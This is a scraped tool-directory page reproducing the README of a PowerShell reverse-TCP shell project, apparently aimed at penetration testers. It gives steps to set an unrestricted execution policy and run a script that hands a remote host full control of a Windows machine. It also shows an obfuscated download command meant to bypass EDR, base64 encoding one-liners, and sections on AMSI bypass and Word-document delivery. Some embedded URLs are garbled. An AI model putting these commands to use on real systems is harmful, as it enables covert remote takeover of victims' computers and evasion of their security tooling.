Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
powershell-reverse-tcp — PowerShell scripts for communicating with a remote host. | Kitploit
Tools/GitHubGitHub/ivan-sincek/powershell-reverse-tcp
Privilege EscalationExploitationIDS/IPS EvasionLateral MovementPost-ExploitationCommand and ControlLearning & EducationRed TeamingPayload Development
GitHubivan-sincek/powershell-reverse-tcp

powershell-reverse-tcp

PowerShell scripts for communicating with a remote host.

30065111 month agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository

PowerShell Reverse TCP

PowerShell scripts for communicating with a remote host.

Remote host will have a full control over the client and all the underlying system commands.

Check shells based on:

  • Invoke-Expression PowerShell command here,
  • process pipes here.

Tested with PowerShell v5.1.19041.2673 on Windows 10 Enterprise OS (64-bit).

Made for educational purposes. I hope it will help!

This repository started to have known signatures and I don't have time to upload new scripts each time so you should obfuscate these scripts yourself.

Future plans:

  • more shells based on process pipes, and optimize them further.

Table of Contents

  • How to Run
  • Obfuscate PowerShell Scripts
    • PowerShell Encoded Command
    • SecureString
  • AMSI Bypass
  • MS Word Integration
  • Set Up a Listener
  • Runtime

How to Run

Change the IP address and port number inside the scripts as necessary.

Open the PowerShell from \src\invoke_expression\original\ or \src\process_pipes\original\ and run the commands shown below.

Set the execution policy:

Set-ExecutionPolicy Unrestricted

Run the script:

.\powershell_reverse_tcp.ps1

Or, run the following command from either PowerShell or Command Prompt:

PowerShell -ExecutionPolicy Unrestricted -File .\powershell_reverse_tcp.ps1

Obfuscate PowerShell Scripts

Try to bypass EDR and other security mechanisms by obfuscating your scripts. You can see such obfuscations in the examples below.

Original PowerShell command:

(New-Object Net.WebClient).DownloadFile($url, $out)

Obfuscated PowerShell command:

& (`G`C`M *ke-E*) '(& (`G`C`M *ew-O*) `N`E`T`.`W`E`B`C`L`I`E`N`T)."`D`O`W`N`L`O`A`D`F`I`L`E"($url, $out)'

Check the original PowerShell script here and the fully obfuscated one here.

After manual obfuscation, the original PowerShell script was obfuscated with Invoke-Obfuscation. Credits to the author!

Search the Internet for additional obfuscation techniques and methods.

P.S. Because PowerShell is constantly being updated, some regular expressions (e.g. *ke-E*) may start to throw exceptions due to multiple methods matching the same expression, so the expressions will need to be specified a little bit better.

PowerShell Encoded Command

To generate a PowerShell encoded command from a PowerShell script, run the following PowerShell command:

[Convert]:https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/:ToBase64String(%5BText.Encoding%5D::Unicode.GetBytes(%5BIO.File%5D::ReadAllText($script)))

To decode a PowerShell encoded command, run the following PowerShell command:

[Text.Encoding]:https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/:Unicode.GetString(%5BConvert%5D::FromBase64String($command))

Use the one-liners below if you don't want to leave any artifacts behind.


[Reverse TCP - Invoke-Expression] To pass parameters to the PowerShell encoded command, run the following command from either PowerShell or Command Prompt:

Download Tool